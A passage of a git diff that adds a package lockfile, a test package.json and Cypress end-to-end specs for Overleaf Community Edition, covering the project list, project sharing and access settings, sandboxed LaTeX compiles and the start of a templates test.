"https://registry.npmjs.org/universalify/-/universalify-0.2.0.tgz", + "integrity": "sha512-CJ1QgKmNg3CwvAv/kOFmtnEN05f0D/cn9QntgNOQlQF9dgvVTHj3t+8JPdjqawCHk7V/KA+fbUqzZ9XWhcqPUg==", + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/tslib": { + "version": "2.6.2", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.2.tgz", + "integrity": "sha512-AEYxH93jGFPn/a2iVAwW87VuUIkR1FVUKB77NwMF7nBTDkDrrT/Hpt/IrCJ0QXhW27jTBDcf5ZY7w6RiqTMw2Q==" + }, + "node_modules/tunnel-agent": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", + "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", + "dependencies": { + "safe-buffer": "^5.0.1" + }, + "engines": { + "node": "*" + } + }, + "node_modules/tweetnacl": { + "version": "0.14.5", + "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", + "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" + }, + "node_modules/type-fest": { + "version": "0.21.3", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", + "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/type-is": { + "version": "1.6.18", + "resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz", + "integrity": "sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==", + "dependencies": { + "media-typer": "0.3.0", + "mime-types": "~2.1.24" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/typescript": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.2.2.tgz", + "integrity": "sha512-mI4WrpHsbCIcwT9cF4FZvr80QUeKvsUsUvKDoR+X/7XHQH98xYD8YHZg7ANtz2GtZt/CBq2QJ0thkGJMHfqc1w==", + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==" + }, + "node_modules/universalify": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-2.0.0.tgz", + "integrity": "sha512-hAZsKq7Yy11Zu1DE0OzWjw7nnLZmJZYTDZZyEFHZdUhV8FkH5MCfoU1XMaxXovpyW5nq5scPqq0ZDP9Zyl04oQ==", + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/unpipe": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz", + "integrity": "sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/untildify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/untildify/-/untildify-4.0.0.tgz", + "integrity": "sha512-KK8xQ1mkzZeg9inewmFVDNkg3l5LUhoq9kN6iWYB/CC9YMG8HA+c1Q8HwDe6dEX7kErrEVNVBO3fWsVq5iDgtw==", + "engines": { + "node": ">=8" + } + }, + "node_modules/url-parse": { + "version": "1.5.10", + "resolved": "https://registry.npmjs.org/url-parse/-/url-parse-1.5.10.tgz", + "integrity": "sha512-WypcfiRhfeUP9vvF0j6rw0J3hrWrw6iZv3+22h6iRMJ/8z1Tj6XfLP4DsUix5MhMPnXpiHDoKyoZ/bdCkwBCiQ==", + "dependencies": { + "querystringify": "^2.1.1", + "requires-port": "^1.0.0" + } + }, + "node_modules/util-deprecate": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" + }, + "node_modules/utils-merge": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz", + "integrity": "sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA==", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/vary": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz", + "integrity": "sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/verror": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", + "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "^1.0.0", + "core-util-is": "1.0.2", + "extsprintf": "^1.2.0" + } + }, + "node_modules/which": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", + "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "node-which": "bin/node-which" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/which-boxed-primitive": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/which-boxed-primitive/-/which-boxed-primitive-1.0.2.tgz", + "integrity": "sha512-bwZdv0AKLpplFY2KZRX6TvyuN7ojjr7lwkg6ml0roIy9YeuSr7JS372qlNW18UQYzgYK9ziGcerWqZOmEn9VNg==", + "dependencies": { + "is-bigint": "^1.0.1", + "is-boolean-object": "^1.1.0", + "is-number-object": "^1.0.4", + "is-string": "^1.0.5", + "is-symbol": "^1.0.3" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-collection": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/which-collection/-/which-collection-1.0.1.tgz", + "integrity": "sha512-W8xeTUwaln8i3K/cY1nGXzdnVZlidBcagyNFtBdD5kxnb4TvGKR7FfSIS3mYpwWS1QUCutfKz8IY8RjftB0+1A==", + "dependencies": { + "is-map": "^2.0.1", + "is-set": "^2.0.1", + "is-weakmap": "^2.0.1", + "is-weakset": "^2.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-typed-array": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/which-typed-array/-/which-typed-array-1.1.13.tgz", + "integrity": "sha512-P5Nra0qjSncduVPEAr7xhoF5guty49ArDTwzJ/yNuPIbZppyRxFQsRCWrocxIY+CnMVG+qfbU2FmDKyvSGClow==", + "dependencies": { + "available-typed-arrays": "^1.0.5", + "call-bind": "^1.0.4", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/wrap-ansi": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", + "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + }, + "node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/yauzl": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-2.10.0.tgz", + "integrity": "sha512-p4a9I6X6nu6IhoGmBqAcbJy1mlC4j27vEPZX9F4L4/vZT3Lyq1VkFHw/V/PUcB9Buo+DG3iHkT0x3Qya58zc3g==", + "dependencies": { + "buffer-crc32": "~0.2.3", + "fd-slicer": "~1.1.0" + } + } + } +} diff --git a/server-ce/test/package.json b/server-ce/test/package.json new file mode 100644 index 0000000..36ba3df --- /dev/null +++ b/server-ce/test/package.json @@ -0,0 +1,28 @@ +{ + "name": "@overleaf/server-ce/test", + "description": "e2e tests for Overleaf Community Edition", + "private": true, + "scripts": { + "cypress:open": "cypress open --e2e --browser chrome", + "cypress:run": "cypress run --e2e --browser chrome", + "format": "prettier --list-different $PWD/'**/*.{js,mjs,ts,tsx,json}'", + "format:fix": "prettier --write $PWD/'**/*.{js,mjs,ts,tsx,json}'" + }, + "dependencies": { + "@isomorphic-git/lightning-fs": "^4.6.0", + "@testing-library/cypress": "^10.0.1", + "@types/adm-zip": "^0.5.5", + "@types/pdf-parse": "^1.1.4", + "@types/uuid": "^9.0.8", + "adm-zip": "^0.5.12", + "body-parser": "^1.20.3", + "celebrate": "^15.0.3", + "cypress": "13.13.2", + "express": "^4.21.2", + "isomorphic-git": "^1.25.10", + "js-yaml": "^4.1.0", + "pdf-parse": "^1.1.1", + "typescript": "^5.0.4", + "uuid": "^9.0.1" + } +} diff --git a/server-ce/test/project-list.spec.ts b/server-ce/test/project-list.spec.ts new file mode 100644 index 0000000..3056242 --- /dev/null +++ b/server-ce/test/project-list.spec.ts @@ -0,0 +1,106 @@ +import { ensureUserExists, login } from './helpers/login' +import { createProject } from './helpers/project' +import { isExcludedBySharding, startWith } from './helpers/config' +import { v4 as uuid } from 'uuid' + +const WITHOUT_PROJECTS_USER = 'user-without-projects@example.com' +const REGULAR_USER = 'user@example.com' + +describe('Project List', () => { + if (isExcludedBySharding('PRO_DEFAULT_2')) return + startWith({ pro: true }) + + const findProjectRow = (projectName: string) => { + cy.log('find project row') + return cy.findByText(projectName).parent().parent() + } + + describe('user with no projects', () => { + ensureUserExists({ email: WITHOUT_PROJECTS_USER }) + + it("'Import from GitHub' is not displayed in the welcome page", () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/project') + cy.findByText('Create a new project').click() + cy.findByText(/Import from GitHub/i).should('not.exist') + }) + }) + + describe('user with projects', () => { + const projectName = `test-project-${uuid()}` + ensureUserExists({ email: REGULAR_USER }) + + before(() => { + login(REGULAR_USER) + createProject(projectName, { type: 'Example Project', open: false }) + }) + beforeEach(function () { + login(REGULAR_USER) + cy.visit('/project') + }) + + it('Can download project sources', () => { + findProjectRow(projectName).within(() => + cy.findByRole('button', { name: 'Download .zip file' }).click() + ) + + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/${projectName}.zip`, + fileToRead: 'main.tex', + }).should('contain', 'Your introduction goes here') + }) + + it('Can download project PDF', () => { + findProjectRow(projectName).within(() => + cy.findByRole('button', { name: 'Download PDF' }).click() + ) + + const pdfName = projectName.replaceAll('-', '_') + cy.task('readPdf', `cypress/downloads/${pdfName}.pdf`).should( + 'contain', + 'Your introduction goes here' + ) + }) + + it('can assign and remove tags to projects', () => { + const tagName = uuid().slice(0, 7) // long tag names are truncated in the UI, which affects selectors + cy.log('select project') + cy.get(`[aria-label="Select ${projectName}"]`).click() + + cy.log('add tag to project') + cy.get('button[aria-label="Tags"]').click() + cy.findByText('Create new tag').click() + cy.get('input[name="new-tag-form-name"]').type(`${tagName}{enter}`) + cy.get(`button[aria-label="Select tag ${tagName}"]`) // tag label in project row + + cy.log('remove tag') + cy.get(`button[aria-label="Remove tag ${tagName}"]`) + .first() + .click({ force: true }) + cy.get(`button[aria-label="Select tag ${tagName}"]`).should('not.exist') + }) + + it('can filter by tag', () => { + cy.log('create a separate project to filter') + const nonTaggedProjectName = `project-${uuid()}` + login(REGULAR_USER) + createProject(nonTaggedProjectName, { open: false }) + + cy.log('select project') + cy.get(`[aria-label="Select ${projectName}"]`).click() + + cy.log('add tag to project') + const tagName = uuid().slice(0, 7) // long tag names are truncated in the UI, which affects selectors + cy.get('button[aria-label="Tags"]').click() + cy.findByText('Create new tag').click() + cy.get('input[name="new-tag-form-name"]').type(`${tagName}{enter}`) + + cy.log( + 'check the non-tagged project is filtered out after clicking the tag' + ) + cy.findByText(nonTaggedProjectName).should('exist') + cy.get('button').contains(tagName).click({ force: true }) + cy.findByText(nonTaggedProjectName).should('not.exist') + }) + }) +}) diff --git a/server-ce/test/project-sharing.spec.ts b/server-ce/test/project-sharing.spec.ts new file mode 100644 index 0000000..e264392 --- /dev/null +++ b/server-ce/test/project-sharing.spec.ts @@ -0,0 +1,305 @@ +import { v4 as uuid } from 'uuid' +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { + createProject, + enableLinkSharing, + openProjectByName, + openProjectViaLinkSharingAsAnon, + openProjectViaLinkSharingAsUser, + shareProjectByEmailAndAcceptInviteViaDash, + shareProjectByEmailAndAcceptInviteViaEmail, +} from './helpers/project' +import { throttledRecompile } from './helpers/compile' +import { beforeWithReRunOnTestRetry } from './helpers/beforeWithReRunOnTestRetry' + +describe('Project Sharing', function () { + if (isExcludedBySharding('CE_CUSTOM_2')) return + ensureUserExists({ email: 'user@example.com' }) + startWith({ withDataDir: true }) + + let projectName: string + beforeWithReRunOnTestRetry(function () { + projectName = `Project ${uuid()}` + setupTestProject() + }) + + beforeEach(() => { + // Always start with a fresh session + cy.session([uuid()], () => {}) + }) + + let linkSharingReadOnly: string + let linkSharingReadAndWrite: string + + function setupTestProject() { + login('user@example.com') + createProject(projectName) + + // Add chat message + cy.findByText('Chat').click() + // wait for lazy loading of the chat pane + cy.findByText('Send your first message to your collaborators') + cy.get( + 'textarea[placeholder="Send a message to your collaborators…"]' + ).type('New Chat Message{enter}') + + // Get link sharing links + enableLinkSharing().then( + ({ linkSharingReadOnly: ro, linkSharingReadAndWrite: rw }) => { + linkSharingReadAndWrite = rw + linkSharingReadOnly = ro + } + ) + } + + function expectContentReadOnlyAccess() { + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + cy.get('.cm-content').should('contain.text', '\\maketitle') + cy.get('.cm-content').should('have.attr', 'contenteditable', 'false') + } + + function expectContentWriteAccess() { + const section = `Test Section ${uuid()}` + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + const recompile = throttledRecompile() + // wait for the editor to finish loading + cy.get('.cm-content').should('contain.text', '\\maketitle') + // the editor should be writable + cy.get('.cm-content').should('have.attr', 'contenteditable', 'true') + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle').parent().type(`\n\\section{{}${section}}`) + // should have written + cy.get('.cm-content').should('contain.text', `\\section{${section}}`) + // check PDF + recompile() + cy.get('.pdf-viewer').should('contain.text', projectName) + cy.get('.pdf-viewer').should('contain.text', section) + } + + function expectNoAccess() { + // try read only access link + cy.visit(linkSharingReadOnly) + cy.url().should('match', /\/login/) + + // Cypress bugs: cypress resolves the link-sharing link outside the browser, and it carries over the hash of the link-sharing link to the login page redirect (bug 1). + // Effectively, cypress then instructs the browser to change the page from /login#read-only-hash to /login#read-and-write-hash. + // This is turn does not trigger a "page load", but rather just "scrolling", which in turn trips up the "page loaded" detection in cypress (bug 2). + // Work around this by navigating away from the /login page in between checks. + cy.visit('/user/password/reset') + + // try read and write access link + cy.visit(linkSharingReadAndWrite) + cy.url().should('match', /\/login/) + } + + function expectChatAccess() { + cy.findByText('Chat').click() + cy.findByText('New Chat Message') + } + + function expectHistoryAccess() { + cy.findByText('History').click() + cy.findByText('Labels') + cy.findByText(/\\begin\{document}/) + cy.findAllByTestId('history-version-metadata-users') + .last() + .should('have.text', 'user') + cy.findByText('Back to editor').click() + } + + function expectNoChatAccess() { + cy.findByText('Layout') // wait for lazy loading + cy.findByText('Chat').should('not.exist') + } + + function expectNoHistoryAccess() { + cy.findByText('Layout') // wait for lazy loading + cy.findByText('History').should('not.exist') + } + + function expectFullReadOnlyAccess() { + expectContentReadOnlyAccess() + expectChatAccess() + expectHistoryAccess() + } + + function expectRestrictedReadOnlyAccess() { + expectContentReadOnlyAccess() + expectNoChatAccess() + expectNoHistoryAccess() + } + + function expectReadAndWriteAccess() { + expectContentWriteAccess() + expectChatAccess() + expectHistoryAccess() + } + + function expectProjectDashboardEntry() { + cy.visit('/project') + cy.findByText(projectName) + } + + function expectEditAuthoredAs(author: string) { + cy.findByText('History').click() + cy.findAllByTestId('history-version-metadata-users') + .first() + .should('contain.text', author) // might have other edits in the same group + } + + describe('via email', function () { + const email = 'collaborator-email@example.com' + ensureUserExists({ email }) + + beforeEach(function () { + login('user@example.com') + shareProjectByEmailAndAcceptInviteViaEmail(projectName, email, 'Viewer') + }) + + it('should grant the collaborator read access', () => { + expectFullReadOnlyAccess() + expectProjectDashboardEntry() + }) + }) + + describe('read only', () => { + const email = 'collaborator-ro@example.com' + ensureUserExists({ email }) + + beforeWithReRunOnTestRetry(function () { + login('user@example.com') + shareProjectByEmailAndAcceptInviteViaDash(projectName, email, 'Viewer') + }) + + it('should grant the collaborator read access', () => { + login(email) + openProjectByName(projectName) + expectFullReadOnlyAccess() + expectProjectDashboardEntry() + }) + }) + + describe('read and write', () => { + const email = 'collaborator-rw@example.com' + ensureUserExists({ email }) + + beforeWithReRunOnTestRetry(function () { + login('user@example.com') + shareProjectByEmailAndAcceptInviteViaDash(projectName, email, 'Editor') + }) + + it('should grant the collaborator write access', () => { + login(email) + openProjectByName(projectName) + expectReadAndWriteAccess() + expectEditAuthoredAs('You') + expectProjectDashboardEntry() + }) + }) + + describe('token access', () => { + describe('logged in', () => { + describe('read only', () => { + const email = 'collaborator-link-ro@example.com' + ensureUserExists({ email }) + + it('should grant restricted read access', () => { + login(email) + openProjectViaLinkSharingAsUser( + linkSharingReadOnly, + projectName, + email + ) + expectRestrictedReadOnlyAccess() + expectProjectDashboardEntry() + }) + }) + + describe('read and write', () => { + const email = 'collaborator-link-rw@example.com' + ensureUserExists({ email }) + + it('should grant full write access', () => { + login(email) + openProjectViaLinkSharingAsUser( + linkSharingReadAndWrite, + projectName, + email + ) + expectReadAndWriteAccess() + expectEditAuthoredAs('You') + expectProjectDashboardEntry() + }) + }) + }) + + describe('with OVERLEAF_ALLOW_PUBLIC_ACCESS=false', () => { + describe('wrap startup', () => { + startWith({ + vars: { + OVERLEAF_ALLOW_PUBLIC_ACCESS: 'false', + }, + withDataDir: true, + }) + it('should block access', () => { + expectNoAccess() + }) + }) + + describe('with OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING=true', () => { + startWith({ + vars: { + OVERLEAF_ALLOW_PUBLIC_ACCESS: 'false', + OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING: 'true', + }, + withDataDir: true, + }) + it('should block access', () => { + expectNoAccess() + }) + }) + }) + + describe('with OVERLEAF_ALLOW_PUBLIC_ACCESS=true', () => { + describe('wrap startup', () => { + startWith({ + vars: { + OVERLEAF_ALLOW_PUBLIC_ACCESS: 'true', + }, + withDataDir: true, + }) + it('should grant read access with read link', () => { + openProjectViaLinkSharingAsAnon(linkSharingReadOnly) + expectRestrictedReadOnlyAccess() + }) + + it('should prompt for login with write link', () => { + cy.visit(linkSharingReadAndWrite) + cy.url().should('match', /\/login/) + }) + }) + + describe('with OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING=true', () => { + startWith({ + vars: { + OVERLEAF_ALLOW_PUBLIC_ACCESS: 'true', + OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING: 'true', + }, + withDataDir: true, + }) + + it('should grant read access with read link', () => { + openProjectViaLinkSharingAsAnon(linkSharingReadOnly) + expectRestrictedReadOnlyAccess() + }) + + it('should grant write access with write link', () => { + openProjectViaLinkSharingAsAnon(linkSharingReadAndWrite) + expectReadAndWriteAccess() + expectEditAuthoredAs('Anonymous') + }) + }) + }) + }) +}) diff --git a/server-ce/test/sandboxed-compiles.spec.ts b/server-ce/test/sandboxed-compiles.spec.ts new file mode 100644 index 0000000..505f8cf --- /dev/null +++ b/server-ce/test/sandboxed-compiles.spec.ts @@ -0,0 +1,245 @@ +import { ensureUserExists, login } from './helpers/login' +import { createProject } from './helpers/project' +import { isExcludedBySharding, startWith } from './helpers/config' +import { throttledRecompile } from './helpers/compile' +import { v4 as uuid } from 'uuid' +import { waitUntilScrollingFinished } from './helpers/waitUntilScrollingFinished' +import { beforeWithReRunOnTestRetry } from './helpers/beforeWithReRunOnTestRetry' + +const LABEL_TEX_LIVE_VERSION = 'TeX Live version' + +describe('SandboxedCompiles', function () { + const enabledVars = { + DOCKER_RUNNER: 'true', + SANDBOXED_COMPILES: 'true', + SANDBOXED_COMPILES_SIBLING_CONTAINERS: 'true', + ALL_TEX_LIVE_DOCKER_IMAGE_NAMES: '2023,2022', + } + + describe('enabled in Server Pro', function () { + if (isExcludedBySharding('PRO_CUSTOM_2')) return + startWith({ + pro: true, + vars: enabledVars, + resetData: true, + }) + ensureUserExists({ email: 'user@example.com' }) + beforeEach(function () { + login('user@example.com') + }) + + it('should offer TexLive images and switch the compiler', function () { + createProject('sandboxed') + const recompile = throttledRecompile() + cy.log('wait for compile') + cy.get('.pdf-viewer').should('contain.text', 'sandboxed') + + cy.log('Check which compiler version was used, expect 2023') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is pdfTeX, Version .+ \(TeX Live 2023\) /) + + cy.log('Switch TeXLive version from 2023 to 2022') + cy.get('header').findByText('Menu').click() + cy.findByText(LABEL_TEX_LIVE_VERSION) + .parent() + .findByText('2023') + .parent() + .select('2022') + cy.get('.left-menu-modal-backdrop').click() + + cy.log('Trigger compile with other TeX Live version') + recompile() + + cy.log('Check which compiler version was used, expect 2022') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is pdfTeX, Version .+ \(TeX Live 2022\) /) + }) + + checkSyncTeX() + checkXeTeX() + checkRecompilesAfterErrors() + }) + + function checkSyncTeX() { + describe('SyncTeX', function () { + let projectName: string + beforeEach(function () { + projectName = `Project ${uuid()}` + createProject(projectName) + const recompile = throttledRecompile() + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle') + .parent() + .type( + `\n\\pagebreak\n\\section{{}Section A}\n\\pagebreak\n\\section{{}Section B}\n\\pagebreak` + ) + recompile() + cy.log('wait for pdf-rendering') + cy.get('.pdf-viewer').within(() => { + cy.findByText(projectName) + }) + }) + + it('should sync to code', function () { + cy.log('navigate to \\maketitle using double click in PDF') + cy.get('.pdf-viewer').within(() => { + cy.findByText(projectName).dblclick() + }) + cy.get('.cm-activeLine').should('have.text', '\\maketitle') + + cy.log('navigate to Section A using double click in PDF') + cy.get('.pdf-viewer').within(() => { + cy.findByText('Section A').dblclick() + }) + cy.get('.cm-activeLine').should('have.text', '\\section{Section A}') + + cy.log('navigate to Section B using arrow button') + cy.get('.pdfjs-viewer-inner') + .should('have.prop', 'scrollTop') + .as('start') + cy.get('.pdf-viewer').within(() => { + cy.findByText('Section B').scrollIntoView() + }) + cy.get('@start').then((start: any) => { + waitUntilScrollingFinished('.pdfjs-viewer-inner', start) + }) + // The sync button is swapped as the position in the PDF changes. + // Cypress appears to click on a button that references a stale position. + // Adding a cy.wait() statement is the most reliable "fix" so far :/ + cy.wait(1000) + cy.get('[aria-label^="Go to PDF location in code"]').click() + cy.get('.cm-activeLine').should('have.text', '\\section{Section B}') + }) + + it('should sync to pdf', function () { + cy.log('zoom in') + cy.findByText('45%').click() + cy.findByText('400%').click() + cy.log('scroll to top') + cy.get('.pdfjs-viewer-inner').scrollTo('top') + waitUntilScrollingFinished('.pdfjs-viewer-inner', -1).as('start') + + cy.log('navigate to title') + cy.findByText('\\maketitle').parent().click() + cy.get('[aria-label="Go to code location in PDF"]').click() + cy.get('@start').then((start: any) => { + waitUntilScrollingFinished('.pdfjs-viewer-inner', start) + .as('title') + .should('be.greaterThan', start) + }) + + cy.log('navigate to Section A') + cy.get('.cm-content').within(() => cy.findByText('Section A').click()) + cy.get('[aria-label="Go to code location in PDF"]').click() + cy.get('@title').then((title: any) => { + waitUntilScrollingFinished('.pdfjs-viewer-inner', title) + .as('sectionA') + .should('be.greaterThan', title) + }) + + cy.log('navigate to Section B') + cy.get('.cm-content').within(() => cy.findByText('Section B').click()) + cy.get('[aria-label="Go to code location in PDF"]').click() + cy.get('@sectionA').then((title: any) => { + waitUntilScrollingFinished('.pdfjs-viewer-inner', title) + .as('sectionB') + .should('be.greaterThan', title) + }) + }) + }) + } + + function checkRecompilesAfterErrors() { + it('recompiles even if there are Latex errors', function () { + login('user@example.com') + createProject('test-project') + const recompile = throttledRecompile() + cy.findByText('\\maketitle').parent().click() + cy.findByText('\\maketitle') + .parent() + .type('\n\\fakeCommand{} \n\\section{{}Test Section}') + recompile() + recompile() + cy.get('.pdf-viewer').should('contain.text', 'Test Section') + cy.get('.logs-pane').should('not.contain.text', 'No PDF') + }) + } + + function checkXeTeX() { + it('should be able to use XeLaTeX', function () { + createProject('XeLaTeX') + const recompile = throttledRecompile() + cy.log('wait for compile') + cy.get('.pdf-viewer').should('contain.text', 'XeLaTeX') + + cy.log('Check which compiler was used, expect pdfLaTeX') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is pdfTeX/) + + cy.log('Switch compiler to from pdfLaTeX to XeLaTeX') + cy.get('header').findByText('Menu').click() + cy.findByText('Compiler') + .parent() + .findByText('pdfLaTeX') + .parent() + .select('XeLaTeX') + cy.get('.left-menu-modal-backdrop').click() + + cy.log('Trigger compile with other compiler') + recompile() + + cy.log('Check which compiler was used, expect XeLaTeX') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is XeTeX/) + }) + } + + function checkUsesDefaultCompiler() { + beforeEach(function () { + login('user@example.com') + }) + + it('should not offer TexLive images and use default compiler', function () { + createProject('sandboxed') + cy.log('wait for compile') + cy.get('.pdf-viewer').should('contain.text', 'sandboxed') + + cy.log('Check which compiler version was used, expect 2025') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is pdfTeX, Version .+ \(TeX Live 2025\) /) + + cy.log('Check that there is no TeX Live version toggle') + cy.get('header').findByText('Menu').click() + cy.findByText('Word Count') // wait for lazy loading + cy.findByText(LABEL_TEX_LIVE_VERSION).should('not.exist') + }) + } + + describe('disabled in Server Pro', function () { + if (isExcludedBySharding('PRO_DEFAULT_2')) return + startWith({ pro: true }) + ensureUserExists({ email: 'user@example.com' }) + beforeEach(function () { + login('user@example.com') + }) + + checkUsesDefaultCompiler() + checkSyncTeX() + checkXeTeX() + checkRecompilesAfterErrors() + }) + + describe.skip('unavailable in CE', function () { + if (isExcludedBySharding('CE_CUSTOM_1')) return + startWith({ pro: false, vars: enabledVars, resetData: true }) + ensureUserExists({ email: 'user@example.com' }) + beforeEach(function () { + login('user@example.com') + }) + + checkUsesDefaultCompiler() + checkSyncTeX() + checkXeTeX() + checkRecompilesAfterErrors() + }) +}) diff --git a/server-ce/test/templates.spec.ts b/server-ce/test/templates.spec.ts new file mode 100644 index 0000000..bb58165 --- /dev/null +++ b/server-ce/test/templates.spec.ts @@ -0,0 +1,257 @@ +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { createProject } from './helpers/project' + +const WITHOUT_PROJECTS_USER = 'user-without-projects@example.com' +const ADMIN_USER = 'admin@example.com' +const REGULAR_USER = 'user@example.com' +const TEMPLATES_USER = 'templates@example.com' + +// Re-use value for "exists" and "does not exist" tests +const LABEL_BROWSE_TEMPLATES = 'Browse templates' + +describe('Templates', () => { + ensureUserExists({ email: TEMPLATES_USER }) + ensureUserExists({ email: WITHOUT_PROJECTS_USER }) + + let 